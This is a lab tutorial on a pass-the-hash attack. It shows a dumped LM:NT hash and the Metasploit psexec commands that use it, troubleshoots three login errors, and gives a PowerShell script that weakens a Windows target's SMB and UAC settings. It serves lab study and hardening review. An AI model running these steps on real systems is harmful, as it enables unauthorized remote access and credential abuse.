Obtaining the hash
On the Windows (XP) target, run gethash.exe -dhl. The output is in pwdump format, user:RID:LM hash:NT hash:::
```
tools:1003:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
```
The first 32 hex characters are the LM hash and the last 32 the NT hash; both are needed for the SMBPass value below. (The second half of the LM hash, AAD3B435B51404EE, is the LM encryption of an empty 7-character block, so this password is at most 7 characters long.)
Starting msf
```
msfconsole
```
1) Load the module
```
use exploit/windows/smb/psexec
```
2) Set the username
```
set SMBUser tools
```
3) Set SMBPass to the hash instead of a password. psexec accepts the LM:NT pair exactly as dumped, which is what makes this a pass-the-hash attack: no cracking is needed.
```
set SMBPass 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
```
4) Attack. Set RHOSTS to the target address first (the errors below show 192.168.48.151 and 192.168.48.144). The account must be a local administrator on the target, because psexec uploads a service binary to the ADMIN$ share and creates a service from it.
```
run
```
Errors
1) Connection refused
Target: Windows XP
```
[-] 192.168.48.151:445 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.48.151:445).
```
Rex::ConnectionRefused means nothing is listening on 445 at all; authentication has not even been attempted. Open port 445 in the Windows XP firewall and start the Server service (LanmanServer), which is what publishes the ADMIN$ share psexec needs.
2) Login failed
Target: Windows XP
```
[-] 192.168.48.151:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
```
Command=115 is SMB_COM_SESSION_SETUP_ANDX, so the failure is in authentication itself. First check that the SMBPass value is correct: the full LM:NT pair, no spaces, copied from the gethash output. If the hash is right, the cause is XP's default "Guest only" sharing model (Simple File Sharing), which maps every network logon to the Guest account, so the real account never authenticates. Press Win + R, open gpedit.msc, go to Local Computer Policy -> Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options, and change "Network access: Sharing and security model for local accounts" to "Classic - local users authenticate as themselves". The same switch is the DWORD ForceGuest under HKLM\SYSTEM\CurrentControlSet\Control\Lsa (1 = Guest only, 0 = Classic), which is useful where gpedit.msc is not available.
3) Remote access to the administrative shares is denied
Newer Windows versions refuse this by default (UAC remote restrictions).
Target: Windows 7
```
[-] 192.168.48.144:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
```
Command=117 is SMB_COM_TREE_CONNECT_ANDX: the hash was accepted, but the connection to ADMIN$ is refused because UAC strips the administrator privileges from the token of a local account that logs on over the network. Set the DWORD LocalAccountTokenFilterPolicy to 1 under the following key (create the value if it does not exist):
```reg
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"LocalAccountTokenFilterPolicy"=dword:00000001
```
This only concerns local accounts: the built-in Administrator (RID 500) is exempt from the filtering by default, and domain accounts are not filtered at all. Setting the value to 1 is exactly what makes the host usable for this attack, which is the point in a lab and a finding to flag in a hardening review.
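The three fixes above are GUI or regedit steps. As an added example that is not part of the original post, the script below does the same from an elevated PowerShell on the target VM, one function per failure mode, and reads the resulting state back so it can be checked before running msf. It assumes PowerShell 2.0 or later (built into Windows 7; an optional install on XP), and the firewall rule name Lab-SMB-445 is our own choice. Every change here deliberately weakens the host, so it belongs on lab VMs only.

```powershell
# Added example (not from the original post): prepare a lab target so that
# exploit/windows/smb/psexec can authenticate with the dumped LM:NT hash.
# Run from an elevated PowerShell on the target. LAB VMs ONLY.

$LsaKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Set-RegDword([string]$Path, [string]$Name, [int]$Value) {
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    # -Force overwrites an existing value instead of failing on it
    New-ItemProperty -Path $Path -Name $Name -PropertyType DWord -Value $Value -Force | Out-Null
}

# Failure 1 (Rex::ConnectionRefused): nothing listens on 445. Start the
# Server service and open the port. 'Lab-SMB-445' is an assumed rule name.
function Enable-SmbServer {
    Set-Service -Name LanmanServer -StartupType Automatic
    Start-Service -Name LanmanServer
    if ([Environment]::OSVersion.Version.Major -ge 6) {
        # Vista/7 and later: Windows Firewall with Advanced Security
        netsh advfirewall firewall add rule name="Lab-SMB-445" dir=in action=allow protocol=TCP localport=445 | Out-Null
    } else {
        # Windows XP: legacy firewall context
        netsh firewall add portopening protocol=TCP port=445 name="Lab-SMB-445" mode=ENABLE | Out-Null
    }
}

# Failure 2 (STATUS_LOGON_FAILURE with a correct hash): ForceGuest=1 is the
# "Guest only" sharing model; 0 is "Classic - local users authenticate as
# themselves", the same switch gpedit.msc flips.
function Set-ClassicSharingModel {
    Set-RegDword -Path $LsaKey -Name 'ForceGuest' -Value 0
}

# Failure 3 (STATUS_ACCESS_DENIED on the ADMIN$ tree connect): UAC remote
# restrictions filter the token of local admin accounts arriving over the
# network. 1 disables the filtering.
function Disable-UacRemoteRestrictions {
    Set-RegDword -Path $PolicyKey -Name 'LocalAccountTokenFilterPolicy' -Value 1
}

# Read the effective state back so it can be verified before launching msf.
function Get-PsexecPrerequisites {
    $lsa = Get-ItemProperty -Path $LsaKey -ErrorAction SilentlyContinue
    $pol = Get-ItemProperty -Path $PolicyKey -ErrorAction SilentlyContinue
    New-Object PSObject -Property @{
        ServerServiceRunning          = ((Get-Service -Name LanmanServer).Status -eq 'Running')
        ForceGuest                    = $lsa.ForceGuest
        LocalAccountTokenFilterPolicy = $pol.LocalAccountTokenFilterPolicy
    }
}

Enable-SmbServer
Set-ClassicSharingModel
Disable-UacRemoteRestrictions
Get-PsexecPrerequisites | Format-List
```

After the script runs, the final readback should show ServerServiceRunning True, ForceGuest 0 and LocalAccountTokenFilterPolicy 1; any other combination points at which of the three errors the next psexec run will hit. Opening 445 by port number rather than by the "File and Printer Sharing" rule group avoids the localized group names on non-English Windows, which is why the firewall step is written that way.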